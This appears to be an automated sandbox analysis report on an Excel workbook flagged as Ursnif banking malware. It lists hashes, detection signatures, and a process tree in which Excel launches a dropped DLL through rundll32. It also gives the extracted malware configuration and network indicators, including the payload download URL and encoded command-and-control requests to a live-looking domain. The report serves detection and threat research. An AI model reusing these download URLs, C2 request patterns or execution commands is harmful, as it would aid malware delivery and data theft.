Loading ...

Play interactive tourEdit tour

Analysis Report Attached_File_898318.xlsb

Overview

General Information

Sample Name:Attached_File_898318.xlsb
Analysis ID:350713
MD5:a8532cadcdc6aa2ca92e78352727bd50
SHA1:de9a89b9a1ac2778660695a982b9f34641fd3608
SHA256:8c54fb4a33fef841a472e5c7d92b49c1d589a8af374e510331f72fb5a4189c4a

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found API chain indicative of debugger detection
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7052 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 4536 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 6688 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6764 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "300", "system": "7d20f8f4847cb6a63944d316a102ff61", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1612925042", "user": "3d11f4f58695dc15e71ab15cd7543d9b", "hash": "0xcf6ed071", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    Process Memory Space: rundll32.exe PID: 4536JoeSecurity_UrsnifYara detected UrsnifJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7052, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer, ProcessId: 4536

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: rundll32.exe.4536.2.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "300", "system": "7d20f8f4847cb6a63944d316a102ff61", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1612925042", "user": "3d11f4f58695dc15e71ab15cd7543d9b", "hash": "0xcf6ed071", "soft": "3"}
      Multi AV Scanner detection for domain / URLShow sources
      Source: api10.laptok.atVirustotal: Detection: 10%Perma Link

      Compliance:

      barindex
      Uses new MSVCR DllsShow sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
      Uses secure TLS version for HTTPS connectionsShow sources
      Source: unknownHTTPS traffic detected: 192.185.16.102:443 -> 192.168.2.6:49728 version: TLS 1.2
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: c:\OldMust\LevelChange\againstlaw\each.pdb source: 2200[1].dll.0.dr
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A17DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

      Software Vulnerabilities:

      barindex
      Document exploit detected (creates forbidden files)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dllJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\ddg\11.dllJump to behavior
      Document exploit detected (drops PE files)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 2200[1].dll.0.drJump to dropped file
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
      Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: global trafficHTTP traffic detected: GET /campo/a/a HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 139.162.190.91Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /api1/_2B3EC16o/ZAwFGYF9Vidd2jOtlAgm/mFihH4UJ9WRC5w2li3g/OmibLsmZh5kJggmEaLzXRw/GA804i0H_2FW_/2Bkfn2No/zd0HyzP1MHF3zy0EvBK150W/_2B_2F72Dj/XoTXOXEzn6drW_2F_/2Bb7rN2KKcCZ/KiFeG39_2BW/irWAdzICnBHe9A/JQjcMLSav9jkNFGwHtKAG/2eL5LYIsSV49BFxc/6fK4w6t6KL1u4HS/P5vv5cRA4KCaKMNSZL/6ARUH9_2F/EAxxwtglWrZsl5pAsfsN/hmQH9PGx0xVYwlQOUAn/SkTHJd4lg4vDyhmkAnMXCm/mjKfMaxW9/ggDtMvzus/3j HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /api1/7tidwRkCPNkyKHRu/sM7SqYc7lDPAe2Y/LxU4hPUrQ8DyLrlP8w/Nv_2FoafN/Gi3x5QhAhJwP6RZeuOE3/JqQwpPFp6P_2Bgw1Ow4/YQbUpkvF6g4Fdj4IZHGtNs/drxOxsX9ra8ze/alAzZjOu/wfTEPlwQzX9RKEQJf5J8q2h/QY5MtTc_2B/fN9jwgMPnCxXHk4JM/h48AsZ0sO93u/BNd8Zp5c15S/_2FwZ_2FDNtvXf/0udmkslKsSD_2BqfUIpZ3/CB9K3mpzjq1wwzDp/YFrr1SvQi2fLHme/2BwbHda90Wbf3bIygC/3yPHqi_2B/qHeLcZQp_2BFoaOMMJJ4/L9wxE1UCA/P HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /api1/quWyI8WCkgN/SXUvWGfiUm7T0f/lzSlHf7sO503xATuzHkPG/Uh6KISBL5d4ngtXF/8CCWBl9aRux0ggg/WjpeRnlHlxQpgYHWF7/SRgr07KRV/r5lQqK3B6jZkHZiIL4cT/yujdqTpvuL8V1NlvglB/sTzNC3Gtg_2Bwr4uzl4_2F/AC089ktgtaMkN/4Kgt2RLr/Ke14XkQchJOlvOHrYVkVyXU/P0CMvsMir5/NwrpznNArerCa8bkI/55ua2Ge0fpbQ/9kzo82khbwL/WEPiqQPRb97B8a/81xN3oY2Fv8ECPICx_2Be/nWcE6nEvng8OxAW2/XsEKKCKa1AcTuvo/k HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: urbandancecity.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Feb 2021 17:44:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
      Source: sheet9.binString found in binary or memory: http://139.162.190.91/campo/a/a.D
      Source: 2200[1].dll.0.drString found in binary or memory: http://majorleave.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.cortana.ai
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.office.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.onedrive.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://augloop.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cdn.entity.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://config.edge.skype.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cortana.ai
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cortana.ai/api
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cr.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dev.cortana.ai
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://devnull.onenote.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://directory.services.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://graph.windows.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://graph.windows.net/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://lifecycle.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://login.windows.local
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://management.azure.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://management.azure.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://messaging.office.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ncus-000.contentsync.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://officeapps.live.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://onedrive.live.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://outlook.office.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://settings.outlook.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://staging.cortana.ai
